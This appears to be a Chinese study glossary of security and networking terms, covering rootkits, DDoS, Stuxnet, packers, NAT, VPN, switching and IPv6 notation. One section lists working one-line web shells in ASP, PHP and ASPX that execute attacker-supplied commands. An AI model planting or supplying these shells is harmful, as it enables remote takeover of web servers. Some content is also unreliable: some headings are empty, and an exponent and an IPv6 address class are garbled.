Rootkit是什么意思

Rootkit是一种特殊类型的能够以管理员身份访问计算机或计算机网络的malware（恶意软件）。典型情况下，黑客们会通过利用已知的漏洞或口令破解而获得用户级访问，从而将Rootkit安装到计算机上。Rootkit安装以后，它将准许攻击者掩饰其入侵行为，并获得对计算机的root级或特权级的访问，在可能的情况下还可以获得对网络上其它计算机的访问。基本上是很难检测到的，而且不可能删除。

Rootkit的目的在于隐藏自己以及其他软件不被发现。通过阻止用户识别和删除攻击者的软件来实现这个目的。Rootkit几乎可以隐藏任何文件，并允许攻击者在受害者计算机上保存许多文件，并且受害者无法看到这些文件。

检测rootkit的最好方法是关闭被怀疑感染rootkit的计算机，然后用另外一个干净的硬盘或其它媒体启动计算机，再用相关的检测软件实施检查（因为一个没有运行的rootkit是无法隐藏自己的）。对于找出的 Rootkit，最好的应对方法便是擦除并重新安装系统。

为了防止Rootkit进入计算机系统，可以使用与防范所有攻击计算机的恶意软件一样的深入防卫策略。深度防卫的要素包括：病毒扫描程序、定期更新软件、在主机和网络上安装防火墙，以及强密码策略。

蜜罐

蜜罐是安全专家故意让人攻击的目标，引诱黑客来攻击。攻击者入侵后，你将知道他是如何得逞的，随时了解针对服务器发动的最新攻击和漏洞。

DDOS

分布式拒绝服务(DDoS)攻击指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动 DDoS 攻击，从而成倍地提高拒绝服务攻击的威力。通常，攻击者使用一个偷窃帐号将DDoS 主控程序安装在一个计算机上，在一个设定的时间主控程序将与大量代理程序通讯，代理程序已经被安装在网络上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术，主控程序能在几秒钟内激活成百上千次代理程序的运行。

震网病毒

指一种蠕虫病毒，是第一个专门定向攻击真实世界中基础（能源）设施的“蠕虫” 病毒，比如核电站，水坝，国家电网。只要电脑操作员将被病毒感染的 U 盘插入 USB 接口，这种病毒就会在神不知鬼不觉的情况下(不会有任何其他操作要求或者提示出现)取得一些工业用电脑系统的控制权。

与传统的电脑病毒相比，“震网”病毒不会通过窃取个人隐私信息牟利。但其极具毒性和破坏力。

一句话木马

asp：

<% execute(request("cmd"))%>

php：

<?php @eval($_POST['cmd']);?> # @符号的意思是不报错，即使执行错误，也不报错。

变形：

<?php $x=$_GET["z"];@eval("$x");?>

aspx：

<% @Page Language="Jscript"%><% eval(Request.Item["pass"])%>

HTTPS的作用

在不安全的网络上创建一个安全信道，并可在使用适当的加密包和服务器证书可被验证且可被信任时，对窃听和中间人攻击提供合理的防护。

HTTP和HTTPS的区别

HTTPS协议需要到CA申请证书；HTTP是超文本传输协议，信息是明文传输；HTTPS是具有安全性的SSL加密传输协议；HTTP使用80端口，HTTPS使用443端口。

手工查找后门木马的小技巧

1、查看系统启动项，看是否有无异常的启动项和服务项，如果有可疑项，直接打开相应的路径，找到程序文件，直接删除并且禁止自启动。

2、查看系统关键目录system32和系统安装目录Windows下的文件，看最新修改的文件里是否有可疑文件或者DLL文件。

3、观察网络连接是否存在异常，重点看远程连接的端口，如8000端口。

OSI七层结构

脱壳

壳出于程序作者想对程序资源压缩、注册保护的目的，软件的壳分为加密壳、压缩壳、伪装壳、多层壳等类，目的都是为了隐藏程序真正的 OEP（入口点，防止被破解）。

“加壳”指的是对编译好的 EXE、DLL 等文件采用加壳来进行保护；“脱壳”指的就是将文件外边的壳去除，恢复文件没有加壳前的状态。

压缩壳只是为了减小程序体积而对资源进行压缩，常见的压缩壳包括 FSG、ASPack、UPX、北斗等；加密壳也就是常说的保护壳、猛壳，它对程序输入表等内容进行加密保护，具有良好的保护效果，常见的加密壳包括 ASPROTECT、ACPROTECT、PELock、幻影等；密码壳平时使用得不多，加密壳的程序只有在正确输入密码后才能运行。

“人肉搜索”

通过集中许多网民的力量去搜索信息和资源的一种方式，包括利用互联网的机器搜索引擎（如百度等）及利用各网民在日常生活中所能掌握的信息来进行收集信息的一种方式。

什么是手机“越狱”？

所谓 iOS 系统的越狱就是取得系统最高权限的行为，越狱前后 iOS 系统本身并不会发生质的改变，只是越狱后可以对 iOS 系统进行更充分的利用而已。

NAT协议

NAT（Network Address Translator）是网络地址转换，它实现内网的IP地址与公网的地址之间的相互转换，将大量的内网 IP 地址转换为一个或少量的公网IP地址，减少对公网 IP 地址的占用。NAT 的最典型应用是：在一个局域网内，只需要一台计算机连接上 Internet，就可以利用 NAT 共享 Internet 连接，使局域网内其他计算机也可以上网。使用 NAT 协议，局域网内的计算机可以访问 Internet上的计算机，但 Internet 上的计算机无法访问局域网内的计算机。

Internet 设计者保留了 IPv4 地址空间的一部分供专用地址使用，专用地址空间中的 IPv4 地址叫专用地址，这些地址永远不会被当做公用地址来分配，所以专用地址永远不会与公用地址重复。

IPv4 专用地址如下：

内网穿透

内网穿透即 NAT 穿透，采用端口映射，让外网的电脑找到处于内网的电脑，同时也可基于 HTTP/2 实现 web 内网穿透。

虚拟专用网络

在公用网络上建立专用网络，进行加密通讯。在企业网络中有广泛应用。VPN 网关通过对数据包的加密和数据包目标地址的转换实现远程访问。例如某公司员工出差到外地，他想访问企业内网的服务器资源，这种访问就属于远程访问。

二层交换机

二层交换机工作于 OSI 模型的第 2 层（数据链路层），故而称为二层交换机。二层交换技术的发展已经比较成熟，二层交换机属数据链路层设备，可以识别数据包中的 MAC 地址信息，根据 MAC 地址进行转发，并将这些 MAC 地址与对应的端口记录在自己内部的一个地址表中。

交换过程

• 当交换机从某个端口收到一个数据包，它先读取包头中的源 MAC 地址，这样它就知道源 MAC 地址的机器是连在哪个端口上的；

• 再去读取包头中的目的 MAC 地址，并在地址表中查找相应的端口；

• 如表中有与这目的 MAC 地址对应的端口，把数据包直接复制到这端口上；

• 如表中找不到相应的端口则把数据包广播到所有端口上，当目的机器对源机器回应时，交换机又可以学习目的 MAC 地址与哪个端口对应，在下次传送数据时就不再需要对所有端口进行广播了。

不断的循环这个过程，对于全网的 MAC 地址信息都可以学习到，二层交换机就是这样建立和维护它自己的地址表。

路由技术

路由器工作在 OSI 模型的第三层—网络层操作，其工作模式与二层交换相似，但路由器工作在第三层，这个区别决定了路由和交换在传递包时使用不同的控制信息，实现功能的方式就不同。工作原理是在路由器的内部也有一个表，这个表所标示的是：如果要去某一个地方，下一步应该向哪里走，如果能从路由表中找到数据包下一步往哪里走，把链路层信息加上转发出去；如果不能知道下一步走向哪里，则将此包丢弃，然后返回一个信息交给源地址。

三层交换机

三层交换技术就是二层交换技术+三层转发技术。传统交换技术是在 OSI 网络标准模型第二层——数据链路层进行操作的，而三层交换技术是在网络模型中的第三层实现了数据包的高速转发，既可实现网络路由功能，又可根据不同网络状况做到最优网络性能。

IPv6地址表示

• 位数共128位，每16位为一个位段，总共划分8个位段。IPv6提供的IP地址空间是IPv4的296倍；IPv6有效解决了IP地址不足的问题，但是推广的进程比较缓慢；IPv6地址分为单播地址、组播地址、多播地址与特殊地址四类；

• 冒号十六进制表示法：按每16位划分一个位段，每个位段被转换为一个4位的十六进制数，并用冒号隔开，此法称为冒号十六进制法。

• 前导零压缩法：也称为零压缩法。在冒号十六进制表示法的基础上，可以省略对每一个位段的前导0，但是每一个位段至少有一个数字，比如0000可以简写为0，000F可以简写为F。注意：只压缩前导0，对于内部的0不压缩，如 FE08 中的0没有被压缩。

• 双冒号表示法：在冒号十六进制表示法或者零压缩法的基础上，如果几个连续位段都为0，那么这些0可以简写为：：。注意：::双冒号只能出现一次。